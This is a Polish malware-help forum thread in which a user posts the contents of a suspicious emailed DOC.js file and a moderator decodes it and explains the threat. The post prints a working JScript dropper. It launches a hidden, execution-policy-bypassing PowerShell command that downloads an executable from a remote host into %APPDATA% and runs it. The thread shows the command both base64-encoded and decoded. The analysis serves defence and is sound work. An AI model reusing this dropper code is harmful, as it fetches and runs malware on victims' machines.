dzidexx Opublikowano 12 Października 2017 Zgłoś Udostępnij Opublikowano 12 Października 2017 (edytowane) Witam, jak w temacie: Nazwa DOC.js pszyszedł z dość podejrzanym mailem, pobrałem na tablet z androidem. Wewnątrz pliku: var TnoRM = new ActiveXObject("shell.application"); TnoRM.ShellExecute("powershell.exe", "powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBtAHcAbwBqAGMAaQBlAGMAaABvAHcAaQBjAHoALgBuAHMAdAByAGUAZgBhAC4AcABsAC8AegBkAHIALwBzADUAMAAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAbgB2AGkAZAAuAGUAeABlAB0gKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAaQBkAC4AZQB4AGUAHSApAA==", "C:\\Windows\\system32\\WindowsPowerShell\\v1.0", "open", "1");Może ktoś spojrzeć co to jest?W załączniku plik ze zmienionym .js na .txt Edytowane 12 Października 2017 przez picasso Kasuje zainfekowany załącznik. //Miszel03 Odnośnik do komentarza
picasso Opublikowano 12 Października 2017 Zgłoś Udostępnij Opublikowano 12 Października 2017 Plik w postaci załącznika został usunięty, gdyż nie wolno na serwer tutaj ładować zainfekowanych plików, niezależnie od tego czy plik stanowiłby zagrożenie dla innych (zmieniona nazwa rozszerzenia). Cytowana zawartość pliku bez wątpienia wskazuje, że to szkodnik, ale szkodnik dla platformy Windows wykorzystujący wbudowany w system PowerShell. Komenda wdrażana przy udziale PowerShell po odkodowaniu: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('hxxp://mwojciechowicz.nstrefa.pl/zdr/s50.exe', $env:APPDATA\nvid.exe );Start-Process ( $env:APPDATA\nvid.exe ) [Czyli jest pobierany z serwera plik s50.exe, który zostaje wstawiony na Windows w ścieżce %AppData%\nvid.exe]Jeśli załącznik był pobrany tylko na tablet z Androidem, tu kończy się pomoc, gdyż ani nie ma narzędzi diagnostycznych na Androida które stosujemy tutaj, ani cytowana zawartość nie wskazuje by platforma Android była w zakresie działania infekcji. Jeśli jednak załącznik miał styczność z platformą Windows, wymagane są raporty obowiązkowe działu. Odnośnik do komentarza
dzidexx Opublikowano 12 Października 2017 Autor Zgłoś Udostępnij Opublikowano 12 Października 2017 Dzięki, Nie pobrałem załącznika na Windows, na tablecie szkód nie zrobił. @picasso Sorry za wstawienie załącznika i za zły dział. Nie bywam tu często...odpukać. Odnośnik do komentarza
Rekomendowane odpowiedzi